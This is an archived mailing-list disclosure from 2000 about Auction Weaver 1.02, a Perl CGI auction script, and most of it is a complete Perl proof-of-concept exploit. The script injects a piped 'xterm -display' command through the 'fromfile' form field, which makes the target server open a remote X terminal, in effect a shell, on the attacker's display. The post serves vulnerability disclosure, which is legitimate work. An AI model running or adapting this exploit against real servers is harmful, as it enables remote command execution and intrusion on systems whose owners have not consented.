OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
Subject: More problems with Auction Weaver & CGI Script Center.
From: teleh0r - (teleh0rDOGLOVER.COM)
Date: Wed Aug 30 2000 - 12:20:33 CDT


CGI Script Center recently upgraded Auction Weaver 1.0 to
1.2 due to a security issue found and reported by Meliksah Ozoral.

Today, I decided to take a look at Auction Weaver just to check
if the issue and possible other security problems were now fixed.

I guessed they had taken a *close* look at their scripts, considering
the problems reported lately - but I guessed wrong...

I have only been able to check the below exploit on the shareware
version, but I strongly believe that the PRO version is exploitable
as well.

Or perhaps only those who pays gets secure scripts? Maybe that would
be a successful business policy? ;)

CGI Script Center, _please_ contact me if you want help securing your
scripts.

Sincerely yours,
teleh0r

8<---auctionweaver-exploit.pl------------------------------------

#!/usr/bin/perl -w

## Auction Weaver 1.02 / Only confirmed with LITE
## - Proof of Concept exploit -
##
## CGI Script Center have just released an update
## of Auction Weaver due to security reasons - I
## suggest that you spend some more time securing
## it, and the other scripts - It is really needed.
##
## This exploit will spawn a xterm from $target
## to $attacker.
##
## This exploit will not work on hosts running
## Auction Weaver on NT, due to the xterm call.
##
## CGI Script Center, please contact me if you need
## help with securing your scripts...
##
## teleh0rdoglover.com / anno 2000
## http://teleh0r.cjb.net

use strict; use Socket;

if (ARGV < 3) {
print("Usage: $0 <target> <attacker> <dpy>\n");
exit(1);
}

my($target,$attacker,$dpy,$length,$cgicode,
$agent,$sploit,$iaddr,$paddr,$proto);

($target,$attacker,$dpy) = ARGV;

if ($dpy !~ /\d/) {
print("dpy must be a number, probably 0\n");
exit(1);
}

print("\nRemote host: $target\n");
print("CGI-script: /cgi-bin/awl/auctionweaver.pl\n");
print("Command: xterm -ut -display $attacker:$dpy\n\n");

system("xhost + $target");

$length = 138 + length($attacker.$dpy);

$cgicode =
"flag1=1&fromfile=%7Cxterm+-display+$attacker%3A$dpy%7C&placebid=1&catdir".
"=cat1&username=teleh0r&password=ohbaby&bid=Ihavenomoney&nobiditem=1&sbut".
"ton=BID";

$agent = "Mozilla/4.0 (compatible; MSIE 5.01; Windows 95)";

# The path to auctionweaver.pl may of course need to be changed.

$sploit=
"POST /cgi-bin/awl/auctionweaver.pl HTTP/1.0
Connection: close
User-Agent: $agent
Host: $target
Content-type: application/x-www-form-urlencoded
Content-length: $length

$cgicode";

$iaddr = inet_aton($target) || die("Error: $!\n");
$paddr = sockaddr_in(80, $iaddr) || die("Error: $!\n");
$proto = getprotobyname('tcp') || die("Error: $!\n");

socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");
connect(SOCKET, $paddr) || die("Error: $!\n");
send(SOCKET,"$sploit\015\012", 0) || die("Error: $!\n");
close(SOCKET);

sleep(3);
system("xhost - $target");
print("\nAll done - hopefully you got the flying xterm!\n");
exit(0)

-----------------------------------------------------------------

______________________________________________
FREE Personalized Email at Mail.com
Sign up at http://www.mail.com/?sr=signup